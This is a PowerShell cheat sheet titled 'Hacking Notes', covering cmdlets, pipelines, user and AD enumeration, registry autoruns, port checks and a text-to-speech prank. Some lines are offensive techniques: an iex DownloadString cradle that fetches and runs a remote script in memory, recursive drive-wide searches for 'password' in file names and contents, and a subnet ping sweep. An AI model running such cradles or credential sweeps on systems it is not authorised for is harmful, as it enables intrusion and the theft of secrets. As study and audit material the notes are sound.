Hacking Notes

Powershell

Basics

Use Get-Member to list all properties and methods of an object!

get-command set*    # Searches for all cmdlets that start with "set"
alias               # List all aliases in shell
Get-ChildItem       # Same as ls, dir, and gci
Copy-Item           # Same as cp, copy, and cpi
Move-Item           # Same as mv, move, and mi
Select-String       # Same as sls and similar to grep
Get-Help            # Get help!!
Get-Content         # Same as cat, type, gc
Get-Process         # Same as ps, gps
Get-Location        # Same as pwd, gl
Get-Member          # Get properties and methods of objects - USEFUL!!!!
ps | format-list -property name, id, starttime    # Formatted list of process properties
ls env:             # List all PS environment variables
ls variable:        # List all PS variables

Getting Help

help gci                # displays help for Get-ChildItem
help gci -detailed      # Very verbose help information
help gci -examples      # Examples on how to USE it!!!
help gci -full          # Pretty much everything it has about it
Remove-Item *.* -WhatIf    # Explains what WOULD happen, but not actually do it

Pipeline Objects

Pipeline objects carry the output of one command into the next, which is what lets you chain operations in a pipe. The % is an alias for the ForEach-Object command. The current object in an array of objects is referred to as $_. Pipeline objects can be filtered with the ? alias for Where-Object, whose script block must return true or false for each object. The first command below writes out all names and PIDs of the processes returned by the ps alias.

ps | gm        # Find all properties and methods first
ps | % {write-host "name is" $_.name " and pid is " $_.ID}
# ? only filters, so the script block must evaluate to a boolean; do the printing in a % after it.
# Process objects have no Status property, so filter on one they do have, e.g. Responding
ps | ? {$_.Responding} | % {write-host "Responding process name is " $_.Name " and pid is " $_.ID}

# Counting loops to move between two sets of numbers
1..10 | % {echo $_}
1..255 | % {ping -n 1 192.168.0.$_ | select-string ttl}

Enumerate Local Users

Enumerate the local users on the machine and print out important information about their accounts.

Get-LocalUser | Select-Object Name, LastLogon, PasswordLastSet, Enabled, PasswordRequired, PrincipalSource, Description | Format-Table -AutoSize
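The one-liner above dumps the raw account properties; an audit usually wants the accounts that stand out flagged with a reason. The following is an added example (not from the original notes) that applies the ?/% pipeline pattern from the Pipeline Objects section to Get-LocalUser and reports enabled accounts with no password requirement, a stale password, or no recent logon. The day thresholds are assumptions, adjust them to your own policy.

```powershell
# Added example, not part of the original notes. Flags enabled local accounts worth a second look.
function Get-StaleLocalUser {
    param(
        [int]$MaxPasswordAgeDays = 90,   # assumption: your password rotation policy
        [int]$MaxIdleDays        = 180   # assumption: what counts as a dormant account
    )
    $now = Get-Date
    Get-LocalUser | Where-Object { $_.Enabled } | ForEach-Object {
        $reasons = @()
        if (-not $_.PasswordRequired) { $reasons += 'no password required' }
        # PasswordLastSet and LastLogon are $null for accounts that never had one, so guard before subtracting
        if ($_.PasswordLastSet -and ($now - $_.PasswordLastSet).Days -gt $MaxPasswordAgeDays) {
            $reasons += "password older than $MaxPasswordAgeDays days"
        }
        if ($_.LastLogon -and ($now - $_.LastLogon).Days -gt $MaxIdleDays) {
            $reasons += "no logon in $MaxIdleDays days"
        }
        if ($reasons) {
            [pscustomobject]@{
                Name            = $_.Name
                PrincipalSource = $_.PrincipalSource
                PasswordLastSet = $_.PasswordLastSet
                LastLogon       = $_.LastLogon
                Reasons         = ($reasons -join '; ')
            }
        }
    }
}

Get-StaleLocalUser | Format-Table -AutoSize
```

Because the function emits objects rather than text, the result can be piped into Export-Csv or compared against a previous run instead of being read off the screen.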

Enumerate AD Users

We can import the signed Microsoft ActiveDirectory module into PowerShell directly in memory to enumerate AD users and systems. This leverages the signed module kept at https://github.com/samratashok/ADModule. After importing we have access to all AD commands in PowerShell.

iex (new-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/samratashok/ADModule/master/Import-ActiveDirectory.ps1');Import-ActiveDirectory

Searching

Looking for files and directories.

# Search the entire C:\ dir for anything with "password" in the filename. The second positional argument
# to gci is -Filter, so wrap the word in wildcards or only a file named exactly "password" will match.
# Put stderr (access denied and friends) in null where it belongs
gci -recurse C:\ -filter *password* 2>$null | % {echo $_.fullname}

# Select-string works similar to grep
select-string -path C:\Users\*.txt -pattern password

# Put both together! Look in each file for the string "password". -file keeps directories out of select-string
gci -recurse -file C:\ 2>$null | % {select-string -path $_.FullName -pattern password} 2>$null
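Running Select-String over every file on the drive is slow and produces noise from binaries. As an added example (not from the original notes), the function below restricts the search to text-like files under a size limit and returns objects with path, line number and matching line, which is the shape you want when checking user profiles for plaintext credentials during an audit. The extension list and size cap are assumptions.

```powershell
# Added example, not part of the original notes. Combines gci and select-string into a reusable search.
function Find-StringInFiles {
    param(
        [string]$Root    = 'C:\Users',
        [string]$Pattern = 'password',
        # assumption: the extensions most likely to hold readable configuration or notes
        [string[]]$Include = @('*.txt','*.ini','*.config','*.xml','*.ps1','*.bat','*.cmd','*.log'),
        [int]$MaxSizeKB = 1024              # assumption: skip large files that are rarely hand-written
    )
    Get-ChildItem -Path $Root -Recurse -File -Include $Include -ErrorAction SilentlyContinue |
        Where-Object { $_.Length -le ($MaxSizeKB * 1KB) } |
        # Select-String binds the FileInfo objects coming down the pipe to its -Path parameter
        Select-String -Pattern $Pattern -ErrorAction SilentlyContinue |
        ForEach-Object {
            [pscustomobject]@{
                Path  = $_.Path
                Line  = $_.LineNumber
                Match = $_.Line.Trim()
            }
        }
}

Find-StringInFiles -Root 'C:\Users' -Pattern 'password' | Format-Table -AutoSize
```

-ErrorAction SilentlyContinue does the same job as 2>$null in the one-liners above but keeps the errors out of the pipeline entirely, so the output stays clean when piped further.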

Navigate Registry

# Can navigate Reg just like the file system using tab completion
cd HKLM:\
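The registry provider means keys can be listed and read with the same cmdlets used on files. As an added example (not from the original notes), the function below walks the well-known Run and RunOnce autostart keys for the machine and the current user and returns each value with the command it launches, which is a quick way to review what starts at logon.

```powershell
# Added example, not part of the original notes. Lists autostart entries through the registry provider.
function Get-AutorunEntry {
    $runKeys = @(
        'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run',
        'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce',
        'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run',
        'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce'
    )
    foreach ($key in $runKeys) {
        # RunOnce keys are often absent; Test-Path works on registry paths as well as files
        if (-not (Test-Path $key)) { continue }
        $props = Get-ItemProperty -Path $key
        # Get-ItemProperty adds PSPath, PSParentPath, etc. to the object; drop those to keep only real values
        $props.PSObject.Properties |
            Where-Object { $_.Name -notlike 'PS*' } |
            ForEach-Object {
                [pscustomobject]@{
                    Key     = $key
                    Name    = $_.Name
                    Command = $_.Value
                }
            }
    }
}

Get-AutorunEntry | Format-Table -AutoSize
```

The PS* filter is a convenience; a registry value whose name happens to start with "PS" would be hidden too, so compare against Get-Item -Path $key | Select-Object -ExpandProperty Property if you need an exact list.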

Launch Browsers and reach a specific page

# A quoted path on its own is just a string to PowerShell; the call operator & actually runs it
& "C:\Program Files\Internet Explorer\iexplore.exe" m4lwhere.org
& "C:\Program Files\Mozilla Firefox\firefox.exe" m4lwhere.org

Networking

Quick and dirty way to check if a port is open on a remote computer. The constructor connects immediately: a closed port throws an exception, and a filtered (firewalled) port blocks until the TCP connect timeout expires.

New-Object System.Net.Sockets.TcpClient -ArgumentList "10.0.0.1","389"
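The constructor form above has no timeout, so checking a filtered port can stall for twenty seconds or more. As an added example (not from the original notes), the function below does the same TcpClient connect asynchronously with a caller-chosen timeout and returns an object rather than throwing, which is what you want when confirming that a firewall rule really closes a port. The address and port are placeholders.

```powershell
# Added example, not part of the original notes. TcpClient connect with a timeout instead of the blocking constructor.
function Test-TcpPort {
    param(
        [Parameter(Mandatory)][string]$ComputerName,
        [Parameter(Mandatory)][int]$Port,
        [int]$TimeoutMs = 1000                      # assumption: 1 s is enough on a LAN
    )
    $client = New-Object System.Net.Sockets.TcpClient
    try {
        $async = $client.BeginConnect($ComputerName, $Port, $null, $null)
        # WaitOne returns $false if nothing came back in time (typical of a filtered port)
        $open = $async.AsyncWaitHandle.WaitOne($TimeoutMs)
        if ($open) { $client.EndConnect($async) }   # throws if the connection was refused (closed port)
        [pscustomobject]@{ ComputerName = $ComputerName; Port = $Port; Open = $open }
    } catch {
        [pscustomobject]@{ ComputerName = $ComputerName; Port = $Port; Open = $false }
    } finally {
        $client.Close()
    }
}

Test-TcpPort -ComputerName '10.0.0.1' -Port 389
```

The function does not distinguish refused from timed out; if that matters, record $open separately from the catch path, since a refusal means a host answered and a timeout usually means something in between dropped the packet.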

Speaking to the Users!

This is a hilarious way to download a random cat fact and have it speak to the user through the speaker.

Add-Type -AssemblyName System.Speech
$SpeechSynth = New-Object System.Speech.Synthesis.SpeechSynthesizer
$SpeechSynth.SelectVoice("Microsoft Zira Desktop")   # Voice must be installed; $SpeechSynth.GetInstalledVoices() lists them
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
$Response = Invoke-WebRequest -Verbose -Uri https://catfact.ninja/fact -UseBasicParsing
$CatFact = ConvertFrom-Json $Response.Content        # ConvertFrom-Json wants the JSON string, not the response object
$CatFact.fact
$SpeechSynth.Speak("Did you know ?")
$SpeechSynth.Speak($CatFact.fact)

Last updated 2 years ago